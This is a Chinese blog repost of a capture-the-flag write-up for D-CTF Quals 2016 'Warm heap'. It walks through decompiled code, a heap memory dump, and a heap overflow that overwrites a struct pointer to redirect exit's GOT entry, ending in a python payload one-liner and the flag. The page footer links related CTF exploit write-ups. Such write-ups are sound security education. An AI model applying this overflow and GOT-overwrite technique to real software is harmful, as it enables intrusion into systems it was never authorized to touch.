D-CTF Quals 2016 - Warm heap

最新推荐文章于 2023-04-11 18:57:28 发布
最新推荐文章于 2023-04-11 18:57:28 发布
阅读量630 收藏
点赞数
分类专栏: PWN PWN类型之堆溢出 文章标签: heap overflow
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33528164/article/details/73433618
版权

原文地址:https://thegoonies.rocks/d-ctf-quals-2016-warm-heap-exploit/
文件下载地址:https://github.com/BBS-Bill-Gates/2016-CTF-WriteUp
checksec:

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

可以看到CANARY没开,可是分析源程序可以这个没什么用,这个不是栈溢出,而是一个堆溢出.
何为堆?何为栈?
答:堆是动态分配内存,栈是静态分配内存.举个最常用的例子就是.数组和mallc.数组是静态分配的,一旦分配其大小就不能改变了.而经malloc分配的大小是可以改变的,于是就有了realloc函数.
IDA PRO后的main函数:

struct foo {
    int64 count;
    void* ptr;
};

struct foo* a = malloc(16); // rbp-0x1020
a.count = 1;
a.ptr = malloc(8);
struct foo* b = malloc(16); // rbp-0x1018
b.count = 2;
b.ptr = malloc(8);
char buf[0x1000];
fgets(buf, 0x1000, stdin);
strcpy(a.ptr, buf);
fgets(buf, 0x1000, stdin);
strcpy(b.ptr, buf);
exit();

分配的堆大小为8,fget的大小可以为0x1000,明显有猫腻.
接下来接着分析a,b两个结构体之后,fget之前内存中的分布:

0x601ff0:   0x0000000000000000  0x0000000000000000
0x602000:   0x0000000000000000  0x0000000000000021
0x602010:   0x0000000000000001  0x0000000000602030
0x602020:   0x0000000000000000  0x0000000000000021
0x602030:   0x00000a6f6c6c6568  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000021
0x602050:   0x0000000000000002  0x0000000000602070
0x602060:   0x0000000000000000  0x0000000000000021
0x602070:   0x0000000000000000  0x0000000000000000
0x602080:   0x0000000000000000  0x0000000000000411
0x602090:   0x00000a6f6c6c6568  0x0000000000000000
0x6020a0:   0x0000000000000000  0x0000000000000000
0x6020b0:   0x0000000000000000  0x0000000000000000
0x6020c0:   0x0000000000000000  0x0000000000000000
0x6020d0:   0x0000000000000000  0x0000000000000000
&a.count=0x602010
&a.ptr  =0x602030
&a.count=0x602050
&a.ptr  =0x602070
strcpy(a.ptr, buf);//将buf中的内容赋给a.ptr
当strcpy(b.ptr, buf);时,程序会取得0x602058处的地址0x0000000000602070,然后将buf中的内容赋给0x0000000000602070处

由于第一次strcpy的长度大于malloc申请的长度,我有就有可能复写0x602058处的地址,修改0x00602070.
接下来的思路就是:
第一次输入:通过输入过长的内容,将0x602058处的内容修改为一个exit的got值(0x601068).
第二次输入:输入0x400826(输出flag值的汇编代码段)
观察上面贴出来的内存段,发现0x602058与0x602030相差0x28=40,
所以第一次输入的内容就为:

"A"*40+"\x68\x10\x60\x00\x00\x00\x00\x00"

第二次输入:

"\x26\x08\x40"

总结下来:

python -c 'print "A"*40+"\x68\x10\x60\x00\x00\x00\x00\x00"+"\n"+"\x26\x08\x40"'

结果:DCTF{b94c21ff7531cba35a498cb074918b3e}

qq_33528164
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CSAW CTF 2016 PWN quals-warmup
Hvnt3r的博客
03-06 2080
CSAW CTF 2016 PWN quals-warmup 原文链接 先对文件有个大致的了解,是64位ELF文件 ☁ csaw ctf 2016 quals-warmup ls exp.py flag.txt readme.txt warmup ☁ csaw ctf 2016 quals-warmup file warmup warmup: ELF 64-bit LSB exec...
CSAW CTF 2016 mfw Writeup
weixin_43622501的博客
03-31 1135
CSAW CTF 2016 mfw Writeup 0x01 需要知道的## 本地文件包含 git源码泄露 0x02 本地文件包含 来自维基百科的解释: In PHP the main cause is due to the use of unvalidated user-input with a filesystem function that includes a file for exe...
csaw ctf 2016 quals-warmup
Fiverya的博客
03-19 480
看一下伪代码,估计gets处会有溢出。 这里是cat flag的函数,地址:0x40060d 输入的位置: payload:
BUUCTF warmup_csaw_2016 writeup
weixin_45999107的博客
02-09 2259
BUUCTF warmup_csaw_2016 打开IDA, 发现: PS:这个题直接把函数位置给了。。。 可以看出,gets绝对有问题,v5的长度为0x40,同时加上返回地址8个字节,所以要溢出总长度为0x48,在运行程序时可以看到sub_40060D的地址就为0x40060D… 所以构建payload:payload = ’a’ * 0x48 + p64(0x40060D),得flag...
csaw-ctf-2016-quals:key
weixin_30680385的博客
07-25 463
下载附件,为exe格式,查壳。 没有加壳,哈哈! 运行下试试。咦?一闪而过????? 拖入OD逐步运行下试试。 运行结束:what happen???? 问我?你问我,我也不知道。 既然没有加壳那就在IDA中打开看下: 主函数没有实质性代码,跟进sub_401100。 发现两处关键代码: 1、?W?h?a?t h?a?p?p?e?n? memset(...
Seccon-CTF-2016-cheer_msg
02-24
样本来自2016年的Seccon ctf的一道pwn题,该题目使用了alloca内存分配函数,该函数不同于一般堆上的内存分配,而是在栈上进行。题解:https://blog.csdn.net/A951860555/article/details/114011564
Google-CTF-2016-Stego.pcap数据包
10-08
Google-CTF-2016-Stego.pcap数据包
Internetwache-CTF-2016:Internetwache CTF 2016存储库
05-03
博客文章: ://en.internetwache.org/internetwache-ctf-2016-review-01-03-2016/ 计分板 计分板基于。 有关更多信息,请检查README.tinyctf.md和LICENSE.tinyctf.md 。 您可以在这里找到我们的修改后的分叉: : ...
h4ckit-ctf-2016-hex0gator-250 ctf ppc
10-09
题目材料
超微X11SPW-CTF主板用户手册
最新发布
04-01
超微X11SPW-CTF主板用户手册
xdctf2015前20名writeup
10-07
2015年xdctf前20名的writeup,绝对不坑
BUUCTF-warmup_csaw_2016
m0_64180167的博客
04-11 447
64位的linux文件。
buuctf warmup_csaw_2016
yidalipao1的博客
09-03 462
buuctf pwn
BUUCTF warmup_csaw_2016
m0_54262894的博客
08-20 339
BUUCTF warmup_csaw_2016 下载文件,把它拖入虚拟机中先checksec一下 这是一个64位的文件,并且没有开启任何的保护 我们先运行一下试试 发现它给出了一个地址,我们先记下,可能会用到 放入64位IDA中查看一下他的代码 伪C代码↓ 汇编代码↓ 发现了一个函数sprintf,并且用%p的方式来输出,也就是输出地址 下面是我搜索到的信息 我们双击40060D看一下 再回过头来看代码 众所周知gets函.
[每日一PWN]BUUCTF warmup_csaw_2016
qq_55233040的博客
11-20 380
和第一题RIP一样,是经典而基础的ret2text。
[BUUCTF-PWN] warmup_csaw_2016
m0_46098032的博客
01-03 354
下载文件,checksec看一下,保护都没开,64位文件。 用IDA64打开文件,查看一下main函数。可以看到明显的栈溢出漏洞(gets)。 看一下v5,v5大小是 0x40, 返回地址是8 字节, 溢出大小就是0x48。 sub_40060D有点可疑,双击看一下。发现这里就是system函数,我们在构造pyaload的时候加上sub_40060D。 exp为: from pwn import * p = remote('node4.buuoj.cn', 2574...
[BUUCTF-pwn]——warmup_csaw_2016
Y_peak的博客
01-30 3798
BUUCTF——warmup_csaw_2016 题目地址:https://buuoj.cn/challenges 题目: 管他三七二十一,先将文件下载下来再说。老规矩,现在Linux上用checksec看看文件。64位,Stack、NX、PIE都没有开,应该是栈溢出的题。 赶快 go go go 去window 上用IDA反汇编看看,看到返回的是gets函数,一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。 按Shift + F12,看一下字符串。不看不知道一看有惊喜。cat flag.
BUUCTF PWN warmup_csaw_2016
Rt1Text的博客
04-22 395
1.checksec+运行 64位/没有保护 2.64位IDA进行 1.main 函数 明显的溢出函数gets() 跟进v5看看 offset = 0x40+8 shift+f12 真不错,cat flag.txt 找它的地址 3.上脚本 from pwn import* #p=process('./3warmup') p=remote("node4.buuoj.cn",28180) flag_addr=0x400611 payload=b'a'*(0...
[BUUCTF]PWN3——warmup_csaw_2016
mcmuyanga的博客
08-24 999
[BUUCTF]3——warmup_csaw_2016 题目网址:https://buuoj.cn/challenges#warmup_csaw_2016 步骤: 例行检查,64位,没有开启任何保护 nc一下,看看输入点的字符串,看到回显了一个地址,之后让我们输入,输入完之后就退出了 用64位ida打开附件,首先shift+f12查看程序里的字符串,可以看到有一个“cat flag.txt”字符串引人注目 双击字符串跟进,ctrl+x查看哪个函数调用了这个字符串,找到函数后按f5反编译成我们熟悉的伪代
Ubuntu-CTF
07-28
CTFd是一个用于举办和参加CTF(Capture The Flag)安全竞赛的平台。根据引用\[1\]和引用\[2\]的内容,你可以按照以下步骤在Ubuntu上搭建CTFd平台: 1. 首先,确保你已经安装了虚拟机并配置好了Ubuntu系统。具体的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值